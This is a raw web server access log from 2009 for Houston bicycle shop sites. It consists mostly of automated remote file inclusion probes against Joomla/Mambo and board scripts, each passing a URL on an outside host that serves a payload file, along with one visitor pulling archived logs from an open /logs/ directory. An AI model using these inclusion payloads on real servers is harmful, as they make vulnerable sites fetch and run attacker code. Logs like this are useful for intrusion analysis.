91.192.20.164 - - [11/Oct/2009:01:34:34 -0700] "GET /logs/access.log%20%20//?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.192.20.164 - - [11/Oct/2009:01:34:34 -0700] "GET /logs//?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.192.20.164 - - [11/Oct/2009:01:34:34 -0700] "GET /?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
190.228.29.70 - - [11/Oct/2009:01:34:38 -0700] "GET /skin/ggambo7002_board/setup.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
190.228.29.70 - - [11/Oct/2009:01:34:38 -0700] "GET /logs//skin/ggambo7002_board/setup.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
190.228.29.70 - - [11/Oct/2009:01:34:46 -0700] "GET /logs/access.log//skin/ggambo7002_board/setup.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.251.147.194 - - [11/Oct/2009:01:37:09 -0700] "GET /logs/access.log//skin/zero_vote/login.php?dir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.251.147.194 - - [11/Oct/2009:01:37:09 -0700] "GET /skin/zero_vote/login.php?dir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.251.147.194 - - [11/Oct/2009:01:37:09 -0700] "GET /logs//skin/zero_vote/login.php?dir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
220.181.94.230 - - [11/Oct/2009:01:37:37 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "-" "bicyclestoreshouston.com"
125.251.147.194 - - [11/Oct/2009:01:37:40 -0700] "GET /logs/access.log%20%20//?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.251.147.194 - - [11/Oct/2009:01:37:40 -0700] "GET /?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.251.147.194 - - [11/Oct/2009:01:37:40 -0700] "GET /logs//?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "houstonbikeshop.com"
190.228.29.70 - - [11/Oct/2009:01:38:23 -0700] "GET /logs//skin/ggambo7002_boardgallery/modify_comment.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
190.228.29.70 - - [11/Oct/2009:01:38:23 -0700] "GET /skin/ggambo7002_boardgallery/modify_comment.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
190.228.29.70 - - [11/Oct/2009:01:38:23 -0700] "GET /logs/access.log%20%20//skin/ggambo7002_boardgallery/modify_comment.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
190.228.29.70 - - [11/Oct/2009:01:38:41 -0700] "GET /logs/access.log//skin/ggambo7002_boardgallery/modify_comment.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
190.228.29.70 - - [11/Oct/2009:01:38:41 -0700] "GET /skin/ggambo7002_boardgallery/modify_comment.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
190.228.29.70 - - [11/Oct/2009:01:38:41 -0700] "GET /logs//skin/ggambo7002_boardgallery/modify_comment.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
190.228.29.70 - - [11/Oct/2009:01:40:59 -0700] "GET /skin/ggambo7002_boardgallery/modify_comment.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
190.228.29.70 - - [11/Oct/2009:01:40:59 -0700] "GET /logs//skin/ggambo7002_boardgallery/modify_comment.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
190.228.29.70 - - [11/Oct/2009:01:41:10 -0700] "GET /logs/access.log//skin/ggambo7002_boardgallery/modify_comment.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.251.147.194 - - [11/Oct/2009:01:41:39 -0700] "GET /logs//skin/zero_vote/login.php?dir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.251.147.194 - - [11/Oct/2009:01:41:39 -0700] "GET /logs/access.log//skin/zero_vote/login.php?dir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.251.147.194 - - [11/Oct/2009:01:41:39 -0700] "GET /skin/zero_vote/login.php?dir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
64.150.183.219 - - [11/Oct/2009:01:42:29 -0700] "GET /logs/access.log//?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
64.150.183.219 - - [11/Oct/2009:01:43:01 -0700] "GET /logs/access.log//?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.135.134.78 - - [11/Oct/2009:01:44:14 -0700] "GET /logs/access.log//skin/zero_vote/login.php?dir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.135.134.78 - - [11/Oct/2009:01:44:14 -0700] "GET /logs//skin/zero_vote/login.php?dir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.135.134.78 - - [11/Oct/2009:01:44:14 -0700] "GET /skin/zero_vote/login.php?dir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.135.134.78 - - [11/Oct/2009:01:44:31 -0700] "GET /skin/zero_vote/login.php?dir=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.135.134.78 - - [11/Oct/2009:01:44:31 -0700] "GET /logs//skin/zero_vote/login.php?dir=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.135.134.78 - - [11/Oct/2009:01:44:31 -0700] "GET /logs/access.log//skin/zero_vote/login.php?dir=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.135.134.78 - - [11/Oct/2009:01:45:37 -0700] "GET /?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.135.134.78 - - [11/Oct/2009:01:45:37 -0700] "GET /logs/access.log%20%20//?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.135.134.78 - - [11/Oct/2009:01:45:37 -0700] "GET /logs//?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.135.134.78 - - [11/Oct/2009:01:45:42 -0700] "GET /logs/access.log%20%20//?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.135.134.78 - - [11/Oct/2009:01:45:42 -0700] "GET /?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.135.134.78 - - [11/Oct/2009:01:45:42 -0700] "GET /logs//?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "houstonbikeshop.com"
114.4.8.14 - - [11/Oct/2009:01:47:38 -0700] "GET /logs/access.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
114.4.8.14 - - [11/Oct/2009:01:47:38 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
114.4.8.14 - - [11/Oct/2009:01:47:38 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.251.147.194 - - [11/Oct/2009:01:47:48 -0700] "GET /logs/access.log//?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
38.105.83.13 - - [11/Oct/2009:01:57:22 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:57:41 -0700] "GET /temporarypreviewfile.html HTTP/1.1" 200 1706 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:57:43 -0700] "GET /logs/ HTTP/1.1" 200 2368 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:57:44 -0700] "GET /blog/ HTTP/1.1" 401 395 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:57:46 -0700] "GET /Employeesite/ HTTP/1.1" 401 395 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:57:48 -0700] "GET /bullitinboard/ HTTP/1.1" 200 533 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:57:50 -0700] "GET /tmp/ HTTP/1.1" 200 659 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:57:51 -0700] "GET /fit.html HTTP/1.1" 200 17443 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:57:53 -0700] "GET /translations/ HTTP/1.1" 200 3847 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:58:44 -0700] "GET /translations/Galician.txt HTTP/1.1" 200 33430 "http://www.svbikes.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:58:47 -0700] "GET /translations/Turkish.txt HTTP/1.1" 200 32818 "http://www.svbikes.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:58:47 -0700] "GET /translations/Welsh.txt HTTP/1.1" 200 35212 "http://www.svbikes.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
114.4.8.14 - - [11/Oct/2009:01:58:49 -0700] "GET /logs/access.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
38.105.83.13 - - [11/Oct/2009:01:58:49 -0700] "GET /translations/Portuguese_BR.txt HTTP/1.1" 200 28418 "http://www.svbikes.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:58:49 -0700] "GET /translations/Chinese-GB2312.txt HTTP/1.1" 200 26834 "http://www.svbikes.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:58:52 -0700] "GET /translations/Czech.txt HTTP/1.1" 200 33290 "http://www.svbikes.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:58:53 -0700] "GET /translations/Norwegian.txt HTTP/1.1" 200 31468 "http://www.svbikes.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:58:53 -0700] "GET /translations/Danish.txt HTTP/1.1" 200 31970 "http://www.svbikes.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:58:54 -0700] "GET /translations/Portuguese.txt HTTP/1.1" 200 33065 "http://www.svbikes.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:58:54 -0700] "GET /translations/Finnish.txt HTTP/1.1" 200 32278 "http://www.svbikes.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:58:56 -0700] "GET /translations/Chinese-Big5.txt HTTP/1.1" 200 32265 "http://www.svbikes.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:58:57 -0700] "GET /translations/Spanish.txt HTTP/1.1" 200 28587 "http://www.svbikes.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:58:58 -0700] "GET /translations/English-US.txt HTTP/1.1" 200 32000 "http://www.svbikes.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:58:59 -0700] "GET /translations/Korean.txt HTTP/1.1" 200 32652 "http://www.svbikes.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:58:59 -0700] "GET /translations/Russian.txt HTTP/1.1" 200 33248 "http://www.svbikes.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:59:02 -0700] "GET /translations/German.txt HTTP/1.1" 200 29272 "http://www.svbikes.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:59:03 -0700] "GET /translations/Hungarian.txt HTTP/1.1" 200 32528 "http://www.svbikes.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:59:06 -0700] "GET /translations/Icelandic.txt HTTP/1.0" 200 32529 "http://www.svbikes.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:59:07 -0700] "GET /translations/Japanese.txt HTTP/1.1" 200 32739 "http://www.svbikes.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:59:08 -0700] "GET /translations/Polish.txt HTTP/1.1" 200 33091 "http://www.svbikes.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:59:08 -0700] "GET /translations/Dutch.txt HTTP/1.1" 200 28744 "http://www.svbikes.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:59:09 -0700] "GET /translations/Swedish.txt HTTP/1.1" 200 31485 "http://www.svbikes.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:59:10 -0700] "GET /translations/French.txt HTTP/1.1" 200 39051 "http://www.svbikes.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:59:11 -0700] "GET /translations/Italian.txt HTTP/1.1" 200 33975 "http://www.svbikes.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:59:13 -0700] "GET /logs/access_090310.log HTTP/1.1" 200 262144 "http://www.svbikes.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:59:13 -0700] "GET /logs/scripts.log HTTP/1.1" 200 54071 "http://www.svbikes.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:59:15 -0700] "GET /logs/access_090810.log HTTP/1.1" 200 131072 "http://www.svbikes.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:59:15 -0700] "GET /logs/access_090510.log HTTP/1.1" 200 131072 "http://www.svbikes.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:59:17 -0700] "GET /logs/access_090210.log HTTP/1.1" 200 196608 "http://www.svbikes.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:59:18 -0700] "GET /logs/access_090110.log HTTP/1.1" 200 327680 "http://www.svbikes.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:59:19 -0700] "GET /logs/access_081210.log HTTP/1.1" 200 262144 "http://www.svbikes.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:59:21 -0700] "GET /logs/access_090710.log HTTP/1.1" 200 65536 "http://www.svbikes.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:59:22 -0700] "GET /logs/access.log HTTP/1.1" 200 196608 "http://www.svbikes.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:59:23 -0700] "GET /logs/access_090910.log HTTP/1.1" 200 262144 "http://www.svbikes.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:59:25 -0700] "GET /logs/access_090610.log HTTP/1.1" 200 262144 "http://www.svbikes.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:59:25 -0700] "GET /logs/access_090410.log HTTP/1.1" 200 196608 "http://www.svbikes.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:59:26 -0700] "GET /contactus.html HTTP/1.1" 404 275 "http://www.svbikes.com/fit.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:59:28 -0700] "GET /index.html HTTP/1.1" 404 275 "http://www.svbikes.com/fit.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:01:59:29 -0700] "GET /aboutus.html HTTP/1.1" 404 275 "http://www.svbikes.com/fit.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:02:00:40 -0700] "GET /Clinc.html HTTP/1.1" 404 275 "http://www.svbikes.com/fit.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:02:00:40 -0700] "GET /Rides.html HTTP/1.1" 404 275 "http://www.svbikes.com/fit.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:02:00:44 -0700] "GET /Accessories.html HTTP/1.1" 404 275 "http://www.svbikes.com/fit.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:02:00:47 -0700] "GET /Bikes.html HTTP/1.1" 404 275 "http://www.svbikes.com/fit.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:02:00:47 -0700] "GET /services.html HTTP/1.1" 404 275 "http://www.svbikes.com/fit.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
38.105.83.13 - - [11/Oct/2009:02:00:48 -0700] "GET /Product.html HTTP/1.1" 404 275 "http://www.svbikes.com/fit.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.svbikes.com"
61.135.134.78 - - [11/Oct/2009:02:12:10 -0700] "GET /logs/access.log//?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
114.4.8.14 - - [11/Oct/2009:02:16:14 -0700] "GET /logs/access.log/skin/ggambo7002_board/write.php?dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
114.4.8.14 - - [11/Oct/2009:02:16:14 -0700] "GET /logs/skin/ggambo7002_board/write.php?dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
114.4.8.14 - - [11/Oct/2009:02:16:14 -0700] "GET /skin/ggambo7002_board/write.php?dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.135.134.78 - - [11/Oct/2009:02:16:51 -0700] "GET /logs/access.log//?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
114.4.8.14 - - [11/Oct/2009:02:18:15 -0700] "GET /logs/access.log%20%20/skin/ggambo7002_board/write.php?dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
220.181.94.230 - - [11/Oct/2009:02:18:39 -0700] "GET /bullitinboard/viewtopic.php?p=15678 HTTP/1.1" 200 533 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "bicyclestoreshouston.com"
87.250.230.32 - - [11/Oct/2009:02:20:01 -0700] "GET / HTTP/1.1" 200 1764 "-" "Yandex/1.01.001 (compatible; Win16; I)" "bicyclestoreshouston.com"
64.150.183.219 - - [11/Oct/2009:02:21:56 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
64.150.183.219 - - [11/Oct/2009:02:21:56 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
64.150.183.219 - - [11/Oct/2009:02:21:56 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
64.150.183.219 - - [11/Oct/2009:02:21:59 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
64.150.183.219 - - [11/Oct/2009:02:21:59 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
64.150.183.219 - - [11/Oct/2009:02:21:59 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
64.150.183.219 - - [11/Oct/2009:02:22:11 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
64.150.183.219 - - [11/Oct/2009:02:22:11 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
64.150.183.219 - - [11/Oct/2009:02:22:11 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
64.150.183.219 - - [11/Oct/2009:02:22:15 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
64.150.183.219 - - [11/Oct/2009:02:22:15 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
